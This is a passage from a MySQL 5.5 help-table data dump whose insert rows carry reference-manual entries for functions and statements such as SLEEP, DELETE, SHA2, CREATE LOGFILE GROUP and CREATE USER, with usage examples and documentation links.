UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(46,'SLEEP',14,'Syntax:\nSLEEP(duration)\n\nSleeps (pauses) for the number of seconds given by the duration\nargument, then returns 0. If SLEEP() is interrupted, it returns 1. The\nduration may have a fractional part.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(47,'LINESTRING',25,'LineString(pt1,pt2,...)\n\nConstructs a LineString value from a number of Point or WKB Point\narguments. If the number of arguments is less than two, the return\nvalue is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(48,'CONNECTION_ID',17,'Syntax:\nCONNECTION_ID()\n\nReturns the connection ID (thread ID) for the connection. Every\nconnection has an ID that is unique among the set of currently\nconnected clients.\n\nThe value returned by CONNECTION_ID() is the same type of value as\ndisplayed in the ID column of the INFORMATION_SCHEMA.PROCESSLIST table,\nthe Id column of SHOW PROCESSLIST output, and the PROCESSLIST_ID column\nof the Performance Schema threads table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT CONNECTION_ID();\n -> 23786\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(49,'CREATE LOGFILE GROUP',40,'Syntax:\nCREATE LOGFILE GROUP logfile_group\n ADD UNDOFILE \'undo_file\'\n [INITIAL_SIZE [=] initial_size]\n [UNDO_BUFFER_SIZE [=] undo_buffer_size]\n [REDO_BUFFER_SIZE [=] redo_buffer_size]\n [NODEGROUP [=] nodegroup_id]\n [WAIT]\n [COMMENT [=] comment_text]\n ENGINE [=] engine_name\n\nThis statement creates a new log file group named logfile_group having\na single UNDO file named \'undo_file\'. A CREATE LOGFILE GROUP statement\nhas one and only one ADD UNDOFILE clause. For rules covering the naming\nof log file groups, see\nhttp://dev.mysql.com/doc/refman/5.5/en/identifiers.html.\n\n*Note*: All MySQL Cluster Disk Data objects share the same namespace.\nThis means that each Disk Data object must be uniquely named (and not\nmerely each Disk Data object of a given type). For example, you cannot\nhave a tablespace and a log file group with the same name, or a\ntablespace and a data file with the same name.\n\nIn MySQL Cluster NDB 7.2, you can have only one log file group per\nCluster at any given time. (See Bug #16386)\n\nThe optional INITIAL_SIZE parameter sets the UNDO file\'s initial size;\nif not specified, it defaults to 128M (128 megabytes). The optional\nUNDO_BUFFER_SIZE parameter sets the size used by the UNDO buffer for\nthe log file group; The default value for UNDO_BUFFER_SIZE is 8M (eight\nmegabytes); this value cannot exceed the amount of system memory\navailable. Both of these parameters are specified in bytes. In MySQL\nCluster NDB 7.2.14 and later, you may optionally follow either or both\nof these with a one-letter abbreviation for an order of magnitude,\nsimilar to those used in my.cnf. Generally, this is one of the letters\nM (for megabytes) or G (for gigabytes). Prior to MySQL Cluster NDB\n7.2.14, the values for these options could only be specified using\ndigits. (Bug #13116514, Bug #16104705, Bug #62858)\n\nMemory used for UNDO_BUFFER_SIZE comes from the global pool whose size\nis determined by the value of the SharedGlobalMemory data node\nconfiguration parameter. This includes any default value implied for\nthis option by the setting of the InitialLogFileGroup data node\nconfiguration parameter.\n\nThe maximum permitted for UNDO_BUFFER_SIZE is 629145600 (600 MB).\n\nOn 32-bit systems, the maximum supported value for INITIAL_SIZE is\n4294967296 (4 GB). (Bug #29186)\n\nThe minimum allowed value for INITIAL_SIZE is 1048576 (1 MB).\n\nThe ENGINE option determines the storage engine to be used by this log\nfile group, with engine_name being the name of the storage engine. In\nMySQL 5.5, this must be NDB (or NDBCLUSTER). If ENGINE is not set,\nMySQL tries to use the engine specified by the default_storage_engine\nserver system variable (formerly storage_engine). In any case, if the\nengine is not specified as NDB or NDBCLUSTER, the CREATE LOGFILE GROUP\nstatement appears to succeed but actually fails to create the log file\ngroup, as shown here:\n\nmysql> CREATE LOGFILE GROUP lg1 \n -> ADD UNDOFILE \'undo.dat\' INITIAL_SIZE = 10M;\nQuery OK, 0 rows affected, 1 warning (0.00 sec)\n\nmysql> SHOW WARNINGS;\n+-------+------+------------------------------------------------------------------------------------------------+\n| Level | Code | Message |\n+-------+------+------------------------------------------------------------------------------------------------+\n| Error | 1478 | Table storage engine \'InnoDB\' does not support the create option \'TABLESPACE or LOGFILE GROUP\' |\n+-------+------+------------------------------------------------------------------------------------------------+\n1 row in set (0.00 sec)\n\nmysql> DROP LOGFILE GROUP lg1 ENGINE = NDB; \nERROR 1529 (HY000): Failed to drop LOGFILE GROUP\n\nmysql> CREATE LOGFILE GROUP lg1 \n -> ADD UNDOFILE \'undo.dat\' INITIAL_SIZE = 10M\n -> ENGINE = NDB;\nQuery OK, 0 rows affected (2.97 sec)\n\nThe fact that the CREATE LOGFILE GROUP statement does not actually\nreturn an error when a non-NDB storage engine is named, but rather\nappears to succeed, is a known issue which we hope to address in a\nfuture release of MySQL Cluster.\n\nREDO_BUFFER_SIZE, NODEGROUP, WAIT, and COMMENT are parsed but ignored,\nand so have no effect in MySQL 5.5. These options are intended for\nfuture expansion.\n\nWhen used with ENGINE [=] NDB, a log file group and associated UNDO log\nfile are created on each Cluster data node. You can verify that the\nUNDO files were created and obtain information about them by querying\nthe INFORMATION_SCHEMA.FILES table. For example:\n\nmysql> SELECT LOGFILE_GROUP_NAME, LOGFILE_GROUP_NUMBER, EXTRA\n -> FROM INFORMATION_SCHEMA.FILES\n -> WHERE FILE_NAME = \'undo_10.dat\';\n+--------------------+----------------------+----------------+\n| LOGFILE_GROUP_NAME | LOGFILE_GROUP_NUMBER | EXTRA |\n+--------------------+----------------------+----------------+\n| lg_3 | 11 | CLUSTER_NODE=3 |\n| lg_3 | 11 | CLUSTER_NODE=4 |\n+--------------------+----------------------+----------------+\n2 rows in set (0.06 sec)\n\nCREATE LOGFILE GROUP is useful only with Disk Data storage for MySQL\nCluster. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-logfile-group.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-logfile-group.html'),(50,'DELETE',28,'Syntax:\nSingle-table syntax:\n\nDELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM tbl_name\n [WHERE where_condition]\n [ORDER BY ...]\n [LIMIT row_count]\n\nMultiple-table syntax:\n\nDELETE [LOW_PRIORITY] [QUICK] [IGNORE]\n tbl_name[.*] [, tbl_name[.*]] ...\n FROM table_references\n [WHERE where_condition]\n\nOr:\n\nDELETE [LOW_PRIORITY] [QUICK] [IGNORE]\n FROM tbl_name[.*] [, tbl_name[.*]] ...\n USING table_references\n [WHERE where_condition]\n\nFor the single-table syntax, the DELETE statement deletes rows from\ntbl_name and returns a count of the number of deleted rows. This count\ncan be obtained by calling the ROW_COUNT() function (see\nhttp://dev.mysql.com/doc/refman/5.5/en/information-functions.html). The\nWHERE clause, if given, specifies the conditions that identify which\nrows to delete. With no WHERE clause, all rows are deleted. If the\nORDER BY clause is specified, the rows are deleted in the order that is\nspecified. The LIMIT clause places a limit on the number of rows that\ncan be deleted.\n\nFor the multiple-table syntax, DELETE deletes from each tbl_name the\nrows that satisfy the conditions. In this case, ORDER BY and LIMIT\ncannot be used.\n\nwhere_condition is an expression that evaluates to true for each row to\nbe deleted. It is specified as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/select.html.\n\nCurrently, you cannot delete from a table and select from the same\ntable in a subquery.\n\nYou need the DELETE privilege on a table to delete rows from it. You\nneed only the SELECT privilege for any columns that are only read, such\nas those named in the WHERE clause.\n\nAs stated, a DELETE statement with no WHERE clause deletes all rows. A\nfaster way to do this, when you do not need to know the number of\ndeleted rows, is to use TRUNCATE TABLE. However, within a transaction\nor if you have a lock on the table, TRUNCATE TABLE cannot be used\nwhereas DELETE can. See [HELP TRUNCATE TABLE], and [HELP LOCK].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/delete.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/delete.html'),(51,'ROUND',3,'Syntax:\nROUND(X), ROUND(X,D)\n\nRounds the argument X to D decimal places. The rounding algorithm\ndepends on the data type of X. D defaults to 0 if not specified. D can\nbe negative to cause D digits left of the decimal point of the value X\nto become zero.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(52,'NULLIF',6,'Syntax:\nNULLIF(expr1,expr2)\n\nReturns NULL if expr1 = expr2 is true, otherwise returns expr1. This is\nthe same as CASE WHEN expr1 = expr2 THEN NULL ELSE expr1 END.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html\n\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html'),(53,'CLOSE',24,'Syntax:\nCLOSE cursor_name\n\nThis statement closes a previously opened cursor. For an example, see\nhttp://dev.mysql.com/doc/refman/5.5/en/cursors.html.\n\nAn error occurs if the cursor is not open.\n\nIf not closed explicitly, a cursor is closed at the end of the BEGIN\n... END block in which it was declared.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/close.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/close.html'),(54,'STOP SLAVE',8,'Syntax:\nSTOP SLAVE [thread_types]\n\nthread_types:\n [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads. STOP SLAVE requires the SUPER privilege.\nRecommended best practice is to execute STOP SLAVE on the slave before\nstopping the slave server (see\nhttp://dev.mysql.com/doc/refman/5.5/en/server-shutdown.html, for more\ninformation).\n\nWhen using the row-based logging format: You should execute STOP SLAVE\non the slave prior to shutting down the slave server if you are\nreplicating any tables that use a nontransactional storage engine (see\nthe Note later in this section). In MySQL 5.5.9 and later, you can also\nuse STOP SLAVE SQL_THREAD for this purpose.\n\nLike START SLAVE, this statement may be used with the IO_THREAD and\nSQL_THREAD options to name the thread or threads to be stopped.\n\n*Note*: In MySQL 5.5, STOP SLAVE waits until the current replication\nevent group affecting one or more nontransactional tables has finished\nexecuting (if there is any such replication group), or until the user\nissues a KILL QUERY or KILL CONNECTION statement. (Bug #319, Bug\n#38205)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/stop-slave.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/stop-slave.html'),(55,'TIMEDIFF',32,'Syntax:\nTIMEDIFF(expr1,expr2)\n\nTIMEDIFF() returns expr1 − expr2 expressed as a time value. expr1 and\nexpr2 are time or date-and-time expressions, but both must be of the\nsame type.\n\nThe result returned by TIMEDIFF() is limited to the range allowed for\nTIME values. Alternatively, you can use either of the functions\nTIMESTAMPDIFF() and UNIX_TIMESTAMP(), both of which return integers.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'2008-12-31 23:59:59.000001\',\n -> \'2008-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(56,'REPLACE FUNCTION',38,'Syntax:\nREPLACE(str,from_str,to_str)\n\nReturns the string str with all occurrences of the string from_str\nreplaced by the string to_str. REPLACE() performs a case-sensitive\nmatch when searching for from_str.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT REPLACE(\'www.mysql.com\', \'w\', \'Ww\');\n -> \'WwWwWw.mysql.com\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(57,'USE',29,'Syntax:\nUSE db_name\n\nThe USE db_name statement tells MySQL to use the db_name database as\nthe default (current) database for subsequent statements. The database\nremains the default until the end of the session or another USE\nstatement is issued:\n\nUSE db1;\nSELECT COUNT(*) FROM mytable; # selects from db1.mytable\nUSE db2;\nSELECT COUNT(*) FROM mytable; # selects from db2.mytable\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/use.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/use.html'),(58,'LINEFROMTEXT',4,'LineFromText(wkt[,srid]), LineStringFromText(wkt[,srid])\n\nConstructs a LineString value using its WKT representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(59,'CASE OPERATOR',6,'Syntax:\nCASE value WHEN [compare_value] THEN result [WHEN [compare_value] THEN\nresult ...] [ELSE result] END\n\nCASE WHEN [condition] THEN result [WHEN [condition] THEN result ...]\n[ELSE result] END\n\nThe first version returns the result where value=compare_value. The\nsecond version returns the result for the first condition that is true.\nIf there was no matching result value, the result after ELSE is\nreturned, or NULL if there is no ELSE part.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html\n\n','mysql> SELECT CASE 1 WHEN 1 THEN \'one\'\n -> WHEN 2 THEN \'two\' ELSE \'more\' END;\n -> \'one\'\nmysql> SELECT CASE WHEN 1>0 THEN \'true\' ELSE \'false\' END;\n -> \'true\'\nmysql> SELECT CASE BINARY \'B\'\n -> WHEN \'a\' THEN 1 WHEN \'b\' THEN 2 END;\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html'),(60,'SHOW MASTER STATUS',27,'Syntax:\nSHOW MASTER STATUS\n\nThis statement provides status information about the binary log files\nof the master. It requires either the SUPER or REPLICATION CLIENT\nprivilege.\n\nExample:\n\nmysql> SHOW MASTER STATUS;\n+---------------+----------+--------------+------------------+\n| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |\n+---------------+----------+--------------+------------------+\n| mysql-bin.003 | 73 | test | manual,mysql |\n+---------------+----------+--------------+------------------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-master-status.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-master-status.html'),(61,'ADDTIME',32,'Syntax:\nADDTIME(expr1,expr2)\n\nADDTIME() adds expr2 to expr1 and returns the result. expr1 is a time\nor datetime expression, and expr2 is a time expression.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT ADDTIME(\'2007-12-31 23:59:59.999999\', \'1 1:1:1.000002\');\n -> \'2008-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(62,'TO_SECONDS',32,'Syntax:\nTO_SECONDS(expr)\n\nGiven a date or datetime expr, returns a the number of seconds since\nthe year 0. If expr is not a valid date or datetime value, returns\nNULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TO_SECONDS(950501);\n -> 62966505600\nmysql> SELECT TO_SECONDS(\'2009-11-29\');\n -> 63426672000\nmysql> SELECT TO_SECONDS(\'2009-11-29 13:43:32\');\n -> 63426721412\nmysql> SELECT TO_SECONDS( NOW() );\n -> 63426721458\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(63,'TIMESTAMPDIFF',32,'Syntax:\nTIMESTAMPDIFF(unit,datetime_expr1,datetime_expr2)\n\nReturns datetime_expr2 − datetime_expr1, where datetime_expr1 and\ndatetime_expr2 are date or datetime expressions. One expression may be\na date and the other a datetime; a date value is treated as a datetime\nhaving the time part \'00:00:00\' where necessary. The unit for the\nresult (an integer) is given by the unit argument. The legal values for\nunit are the same as those listed in the description of the\nTIMESTAMPADD() function.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1\nmysql> SELECT TIMESTAMPDIFF(MINUTE,\'2003-02-01\',\'2003-05-01 12:05:55\');\n -> 128885\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(64,'UPPER',38,'Syntax:\nUPPER(str)\n\nReturns the string str with all characters changed to uppercase\naccording to the current character set mapping. The default is latin1\n(cp1252 West European).\n\nmysql> SELECT UPPER(\'Hej\');\n -> \'HEJ\'\n\nSee the description of LOWER() for information that also applies to\nUPPER(), such as information about how to perform lettercase conversion\nof binary strings (BINARY, VARBINARY, BLOB) for which these functions\nare ineffective.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(65,'SPATIAL',35,'For MyISAM tables, MySQL can create spatial indexes using syntax\nsimilar to that for creating regular indexes, but using the SPATIAL\nkeyword. Columns in spatial indexes must be declared NOT NULL. The\nfollowing examples demonstrate how to create spatial indexes:\n\no With CREATE TABLE:\n\nCREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g)) ENGINE=MyISAM;\n\no With ALTER TABLE:\n\nALTER TABLE geom ADD SPATIAL INDEX(g);\n\no With CREATE INDEX:\n\nCREATE SPATIAL INDEX sp_index ON geom (g);\n\nSPATIAL INDEX creates an R-tree index. For storage engines that support\nnonspatial indexing of spatial columns, the engine creates a B-tree\nindex. A B-tree index on spatial values is useful for exact-value\nlookups, but not for range scans.\n\nFor more information on indexing spatial columns, see [HELP CREATE\nINDEX].\n\nTo drop spatial indexes, use ALTER TABLE or DROP INDEX:\n\no With ALTER TABLE:\n\nALTER TABLE geom DROP INDEX g;\n\no With DROP INDEX:\n\nDROP INDEX sp_index ON geom;\n\nExample: Suppose that a table geom contains more than 32,000\ngeometries, which are stored in the column g of type GEOMETRY. The\ntable also has an AUTO_INCREMENT column fid for storing object ID\nvalues.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/creating-spatial-indexes.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/creating-spatial-indexes.html'),(66,'FROM_UNIXTIME',32,'Syntax:\nFROM_UNIXTIME(unix_timestamp), FROM_UNIXTIME(unix_timestamp,format)\n\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS.uuuuuu format, depending on\nwhether the function is used in a string or numeric context. The value\nis expressed in the current time zone. unix_timestamp is an internal\ntimestamp value such as is produced by the UNIX_TIMESTAMP() function.\n\nIf format is given, the result is formatted according to the format\nstring, which is used the same way as listed in the entry for the\nDATE_FORMAT() function.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT FROM_UNIXTIME(1196440219);\n -> \'2007-11-30 10:30:19\'\nmysql> SELECT FROM_UNIXTIME(1196440219) + 0;\n -> 20071130103019.000000\nmysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'2007 30th November 10:30:59 2007\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(67,'MEDIUMBLOB',23,'MEDIUMBLOB\n\nA BLOB column with a maximum length of 16,777,215 (224 − 1) bytes.\nEach MEDIUMBLOB value is stored using a 3-byte length prefix that\nindicates the number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(68,'SHA2',12,'Syntax:\nSHA2(str, hash_length)\n\nCalculates the SHA-2 family of hash functions (SHA-224, SHA-256,\nSHA-384, and SHA-512). The first argument is the cleartext string to be\nhashed. The second argument indicates the desired bit length of the\nresult, which must have a value of 224, 256, 384, 512, or 0 (which is\nequivalent to 256). If either argument is NULL or the hash length is\nnot one of the permitted values, the return value is NULL. Otherwise,\nthe function result is a hash value containing the desired number of\nbits. See the notes at the beginning of this section about storing hash\nvalues efficiently.\n\nAs of MySQL 5.5.6, the return value is a nonbinary string in the\nconnection character set. Before 5.5.6, the return value is a binary\nstring; see the notes at the beginning of this section about using the\nvalue as a nonbinary string.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT SHA2(\'abc\', 224);\n -> \'23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7\'\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(69,'IFNULL',6,'Syntax:\nIFNULL(expr1,expr2)\n\nIf expr1 is not NULL, IFNULL() returns expr1; otherwise it returns\nexpr2. IFNULL() returns a numeric or string value, depending on the\ncontext in which it is used.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html\n\n','mysql> SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'\n','http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html'),(70,'SHOW FUNCTION CODE',27,'Syntax:\nSHOW FUNCTION CODE func_name\n\nThis statement is similar to SHOW PROCEDURE CODE but for stored\nfunctions. See [HELP SHOW PROCEDURE CODE].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-function-code.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-function-code.html'),(71,'SHOW ERRORS',27,'Syntax:\nSHOW ERRORS [LIMIT [offset,] row_count]\nSHOW COUNT(*) ERRORS\n\nSHOW ERRORS is a diagnostic statement that is similar to SHOW WARNINGS,\nexcept that it displays information only for errors, rather than for\nerrors, warnings, and notes.\n\nThe LIMIT clause has the same syntax as for the SELECT statement. See\nhttp://dev.mysql.com/doc/refman/5.5/en/select.html.\n\nThe SHOW COUNT(*) ERRORS statement displays the number of errors. You\ncan also retrieve this number from the error_count variable:\n\nSHOW COUNT(*) ERRORS;\nSELECT @@error_count;\n\nSHOW ERRORS and error_count apply only to errors, not warnings or\nnotes. In other respects, they are similar to SHOW WARNINGS and\nwarning_count. In particular, SHOW ERRORS cannot display information\nfor more than max_error_count messages, and error_count can exceed the\nvalue of max_error_count if the number of errors exceeds\nmax_error_count.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-errors.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-errors.html'),(72,'LEAST',20,'Syntax:\nLEAST(value1,value2,...)\n\nWith two or more arguments, returns the smallest (minimum-valued)\nargument. The arguments are compared using the following rules:\n\no If any argument is NULL, the result is NULL. No comparison is needed.\n\no If the return value is used in an INTEGER context or all arguments\n are integer-valued, they are compared as integers.\n\no If the return value is used in a REAL context or all arguments are\n real-valued, they are compared as reals.\n\no If the arguments comprise a mix of numbers and strings, they are\n compared as numbers.\n\no If any argument is a nonbinary (character) string, the arguments are\n compared as nonbinary strings.\n\no In all other cases, the arguments are compared as binary strings.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEAST(\'B\',\'A\',\'C\');\n -> \'A\'\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(73,'=',20,'=\n\nEqual:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(74,'REVERSE',38,'Syntax:\nREVERSE(str)\n\nReturns the string str with the order of the characters reversed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(75,'ISNULL',20,'Syntax:\nISNULL(expr)\n\nIf expr is NULL, ISNULL() returns 1, otherwise it returns 0.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(76,'BINARY',23,'BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores binary byte\nstrings rather than nonbinary character strings. M represents the\ncolumn length in bytes.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(77,'BLOB DATA TYPE',23,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types are TINYBLOB, BLOB, MEDIUMBLOB, and LONGBLOB.\nThese differ only in the maximum length of the values they can hold.\nThe four TEXT types are TINYTEXT, TEXT, MEDIUMTEXT, and LONGTEXT. These\ncorrespond to the four BLOB types and have the same maximum lengths and\nstorage requirements. See\nhttp://dev.mysql.com/doc/refman/5.5/en/storage-requirements.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/blob.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/blob.html'),(78,'CREATE USER',10,'Syntax:\nCREATE USER user_specification [, user_specification] ...\n\nuser_specification:\n user [ identified_option ]\n\nauth_option: {\n IDENTIFIED BY \'auth_string\'\n | IDENTIFIED BY PASSWORD \'hash_string\'\n | IDENTIFIED WITH auth_plugin\n | IDENTIFIED WITH auth_plugin AS \'hash_string\'\n}\n\nThe CREATE USER statement creates new MySQL accounts. An error occurs\nif you try to create an account that already exists.\n\nTo use CREATE USER, you must have the global CREATE USER privilege or\nthe INSERT privilege for the mysql database. When the read_only system\nvariable is enabled, CREATE USER additionally requires the SUPER\nprivilege.\n\nFor each account, CREATE USER creates a new row in the mysql.user table\nwith no privileges and (as of MySQL 5.5.7) assigns the account an\nauthentication plugin. Depending on the syntax used, CREATE USER may\nalso assign the account a password.\n\nEach user_specification clause consists of an account name and\ninformation about how authentication occurs for clients that use the\naccount. This part of CREATE USER syntax is shared with GRANT, so the\ndescription here applies to GRANT as well.\n\nEach account name uses the format described in\nhttp://dev.mysql.com/doc/refman/5.5/en/account-names.html. For example:\n\nCREATE USER \'jeffrey\'@\'localhost\' IDENTIFIED BY \'mypass\';\n\nIf you specify only the user name part of the account name, a host name\npart of \'%\' is used.\n\nThe server assigns an authentication plugin and password to each\naccount as follows, depending on whether the user specification clause\nincludes IDENTIFIED WITH to specify a plugin or IDENTIFIED BY to\nspecify a password:\n\n*Note*: IDENTIFIED WITH is available as of MySQL 5.5.7. Before 5.5.7,\nauthentication plugins are not used, so only the remarks about\nIDENTIFIED BY apply.\n\no With IDENTIFIED WITH, the server assigns the specified plugin and the\n account has no password. If the optional AS \'hash_string\' clause is\n also given, the string is stored as is in the authentication_string\n column (it is assumed to be already hashed in the format required by\n the plugin).\n\no With IDENTIFIED BY, the server assigns no plugin and assigns the\n specified password.\n\no With neither IDENTIFIED WITH nor IDENTIFIED BY, the server assigns no\n plugin and the account has no password.\n\nIf the account has no password, the Password column in the account\'s\nmysql.user table row remains empty, which is insecure. To set the\npassword, use SET PASSWORD. See [HELP SET PASSWORD].\n\nIf the server assigns no plugin to the account, the plugin column in\nthe account\'s mysql.user table row remains empty.\n\nFor client connections that use a given account, the server invokes the\nauthentication plugin assigned to the account and the client must\nprovide credentials as required by the authentication method that the\nplugin implements. If the server cannot find the plugin, either at\naccount-creation time or connect time, an error occurs.\n\nIf an account\'s mysql.user table row has a nonempty plugin column:\n\no The server authenticates client connection attempts using the named\n plugin.\n\no Changes to the account password using SET PASSWORD with PASSWORD()\n must be made with the old_passwords system variable set to the value\n required by the authentication plugin, so that PASSWORD() uses the\n appropriate password hashing method. If the plugin is\n mysql_old_password, the password can also be changed using SET\n PASSWORD with OLD_PASSWORD(), which uses pre-4.1 password hashing\n regardless of the value of old_passwords.\n\nIf an account\'s mysql.user table row has an empty plugin column:\n\no The server authenticates client connection attempts using the\n mysql_native_password or mysql_old_password authentication plugin,\n depending on the hash format of the password stored in the Password\n column.\n\no Changes to the account password using SET PASSWORD can be made with\n PASSWORD(), with old_passwords set to 0 or 1 for 4.1 or pre-4.1\n password hashing, respectively, or with OLD_PASSWORD(), which uses\n pre-4.1 password hashing regardless of the value of old_passwords.\n\nCREATE USER examples:\n\no To specify an authentication plugin for an account, use IDENTIFIED\n WITH auth_plugin. The plugin name can be a quoted string literal or\n an unquoted name. \'auth_string\' is an optional quoted string literal\n to pass to the plugin. The plugin interprets the meaning of the\n string, so its format is plugin specific and it is stored in the\n authentication_string column as given. (This value is meaningful only\n for plugins that use that column.) Consult the documentation for a\n given plugin for information about the authentication string values\n it accepts, if any.\n\nCREATE USER \'jeffrey\'@\'localhost\' IDENTIFIED WITH mysql_native_password;\n\n The server assigns the given authentication plugin to the account but\n no password. Clients must provide no password when they connect.\n However, an account with no password is insecure. To ensure that an\n account uses a specific authentication plugin and has a password with\n the corresponding hash format, specify the plugin explicitly with\n IDENTIFIED WITH, then use SET PASSWORD to set the password:\n\nCREATE USER \'jeffrey\'@\'localhost\' IDENTIFIED WITH 